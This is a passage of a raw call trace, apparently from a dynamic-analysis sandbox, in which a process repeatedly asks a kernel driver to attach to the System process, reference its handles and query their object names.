Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003429d20, HandleInformation=0x0) returned 0x0 [0117.983] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.983] PsReleaseProcessExitSynchronization () returned 0x2 [0117.983] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.983] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800269a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800269a044, ReturnLength=0xfffff88005163508) returned 0x0 [0117.983] ObfDereferenceObject (Object=0xfffffa8003429d20) returned 0x1 [0117.983] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.983] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.983] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.983] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0117.983] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.983] PsAcquireProcessExitSynchronization () returned 0x0 [0117.983] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.983] ObReferenceObjectByHandle (in: Handle=0xffffffff800001a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003429f20, HandleInformation=0x0) returned 0x0 [0117.983] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.983] PsReleaseProcessExitSynchronization () returned 0x2 [0117.983] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.983] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002805044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002805044, ReturnLength=0xfffff88005163508) returned 0x0 [0117.983] ObfDereferenceObject (Object=0xfffffa8003429f20) returned 0x1 [0117.983] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0117.983] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0117.983] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0117.983] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0117.984] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0117.984] PsAcquireProcessExitSynchronization () returned 0x0 [0117.984] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0117.984] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034469d0, HandleInformation=0x0) returned 0x0 [0117.984] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0117.984] PsReleaseProcessExitSynchronization () returned 0x2 [0117.984] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0117.984] ObQueryNameString (in: Object=0xfffffa80034469d0, ObjectNameInfo=0xfffffa8002802044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002802044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.004] ObfDereferenceObject (Object=0xfffffa80034469d0) returned 0x3 [0118.004] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.004] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.004] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.004] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0118.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.004] PsAcquireProcessExitSynchronization () returned 0x0 [0118.004] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002cfd840, HandleInformation=0x0) returned 0x0 [0118.004] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.004] PsReleaseProcessExitSynchronization () returned 0x2 [0118.004] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.004] ObQueryNameString (in: Object=0xfffffa8002cfd840, ObjectNameInfo=0xfffffa80026aa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026aa044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.004] ObfDereferenceObject (Object=0xfffffa8002cfd840) returned 0x1 [0118.004] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.004] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.004] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.004] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.005] PsAcquireProcessExitSynchronization () returned 0x0 [0118.005] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.005] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800343f8f0, HandleInformation=0x0) returned 0x0 [0118.005] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.005] PsReleaseProcessExitSynchronization () returned 0x2 [0118.005] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.005] ObQueryNameString (in: Object=0xfffffa800343f8f0, ObjectNameInfo=0xfffffa8002809044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002809044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.013] ObfDereferenceObject (Object=0xfffffa800343f8f0) returned 0x1 [0118.013] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.014] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.014] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.014] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.014] PsAcquireProcessExitSynchronization () returned 0x0 [0118.014] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.020] ObReferenceObjectByHandle (in: Handle=0xffffffff800001bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003435830, HandleInformation=0x0) returned 0x0 [0118.020] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.020] PsReleaseProcessExitSynchronization () returned 0x2 [0118.020] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.020] ObQueryNameString (in: Object=0xfffffa8003435830, ObjectNameInfo=0xfffffa800281a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.020] ObfDereferenceObject (Object=0xfffffa8003435830) returned 0x1 [0118.020] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.020] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.020] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.021] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0118.021] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.021] PsAcquireProcessExitSynchronization () returned 0x0 [0118.021] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.045] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ec5560, HandleInformation=0x0) returned 0x0 [0118.045] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.045] PsReleaseProcessExitSynchronization () returned 0x2 [0118.045] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.045] ObQueryNameString (in: Object=0xfffffa8002ec5560, ObjectNameInfo=0xfffffa8002808044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002808044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.046] ObfDereferenceObject (Object=0xfffffa8002ec5560) returned 0x1 [0118.046] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.046] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.046] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.046] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0118.046] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.046] PsAcquireProcessExitSynchronization () returned 0x0 [0118.046] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.046] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa801152f050, HandleInformation=0x0) returned 0x0 [0118.046] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.046] PsReleaseProcessExitSynchronization () returned 0x2 [0118.046] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.046] ObQueryNameString (in: Object=0xfffffa801152f050, ObjectNameInfo=0xfffffa800280b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.046] ObfDereferenceObject (Object=0xfffffa801152f050) returned 0x1 [0118.046] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.046] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.046] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.046] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0118.046] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.047] PsAcquireProcessExitSynchronization () returned 0x0 [0118.047] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.047] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8011951f20, HandleInformation=0x0) returned 0x0 [0118.047] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.047] PsReleaseProcessExitSynchronization () returned 0x2 [0118.047] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.047] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800286a284, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800286a284, ReturnLength=0xfffff88005163508) returned 0x0 [0118.047] ObfDereferenceObject (Object=0xfffffa8011951f20) returned 0x1 [0118.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.047] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.047] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0118.047] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.047] PsAcquireProcessExitSynchronization () returned 0x0 [0118.047] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.047] ObReferenceObjectByHandle (in: Handle=0xffffffff800001cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003442b90, HandleInformation=0x0) returned 0x0 [0118.047] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.047] PsReleaseProcessExitSynchronization () returned 0x2 [0118.047] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.047] ObQueryNameString (in: Object=0xfffffa8003442b90, ObjectNameInfo=0xfffffa800283a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800283a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.047] ObfDereferenceObject (Object=0xfffffa8003442b90) returned 0x2 [0118.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.047] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.047] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0118.047] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.048] PsAcquireProcessExitSynchronization () returned 0x0 [0118.048] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.048] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800343f570, HandleInformation=0x0) returned 0x0 [0118.048] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.048] PsReleaseProcessExitSynchronization () returned 0x2 [0118.048] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.048] ObQueryNameString (in: Object=0xfffffa800343f570, ObjectNameInfo=0xfffffa8002875044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002875044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.048] ObfDereferenceObject (Object=0xfffffa800343f570) returned 0x2 [0118.048] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.048] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.048] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.048] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0118.048] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.048] PsAcquireProcessExitSynchronization () returned 0x0 [0118.048] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.048] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003436240, HandleInformation=0x0) returned 0x0 [0118.048] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.048] PsReleaseProcessExitSynchronization () returned 0x2 [0118.048] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.048] ObQueryNameString (in: Object=0xfffffa8003436240, ObjectNameInfo=0xfffffa8002874044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002874044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.048] ObfDereferenceObject (Object=0xfffffa8003436240) returned 0x2 [0118.048] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.049] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.049] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.049] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.049] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.049] PsAcquireProcessExitSynchronization () returned 0x0 [0118.049] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.049] ObReferenceObjectByHandle (in: Handle=0xffffffff800001dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003434bf0, HandleInformation=0x0) returned 0x0 [0118.049] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.049] PsReleaseProcessExitSynchronization () returned 0x2 [0118.049] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.049] ObQueryNameString (in: Object=0xfffffa8003434bf0, ObjectNameInfo=0xfffffa8002873044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002873044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.049] ObfDereferenceObject (Object=0xfffffa8003434bf0) returned 0x1 [0118.049] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.049] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.049] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.049] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.049] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.049] PsAcquireProcessExitSynchronization () returned 0x0 [0118.049] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.049] ObReferenceObjectByHandle (in: Handle=0xffffffff800001e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003441aa0, HandleInformation=0x0) returned 0x0 [0118.049] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.049] PsReleaseProcessExitSynchronization () returned 0x2 [0118.049] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.049] ObQueryNameString (in: Object=0xfffffa8003441aa0, ObjectNameInfo=0xfffffa8002871044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002871044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.050] ObfDereferenceObject (Object=0xfffffa8003441aa0) returned 0x2 [0118.050] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.050] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.050] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.050] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.050] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.050] PsAcquireProcessExitSynchronization () returned 0x0 [0118.050] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.050] ObReferenceObjectByHandle (in: Handle=0xffffffff800001ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80035257d0, HandleInformation=0x0) returned 0x0 [0118.050] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.050] PsReleaseProcessExitSynchronization () returned 0x2 [0118.050] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.050] ObQueryNameString (in: Object=0xfffffa80035257d0, ObjectNameInfo=0xfffffa8002870044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002870044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.050] ObfDereferenceObject (Object=0xfffffa80035257d0) returned 0x2 [0118.050] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.050] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.050] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.050] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0118.050] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.050] PsAcquireProcessExitSynchronization () returned 0x0 [0118.050] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.050] ObReferenceObjectByHandle (in: Handle=0xffffffff800001f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800352a560, HandleInformation=0x0) returned 0x0 [0118.050] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.050] PsReleaseProcessExitSynchronization () returned 0x2 [0118.050] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.050] ObQueryNameString (in: Object=0xfffffa800352a560, ObjectNameInfo=0xfffffa8002492044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002492044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.052] ObfDereferenceObject (Object=0xfffffa800352a560) returned 0x1 [0118.054] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.054] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.054] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 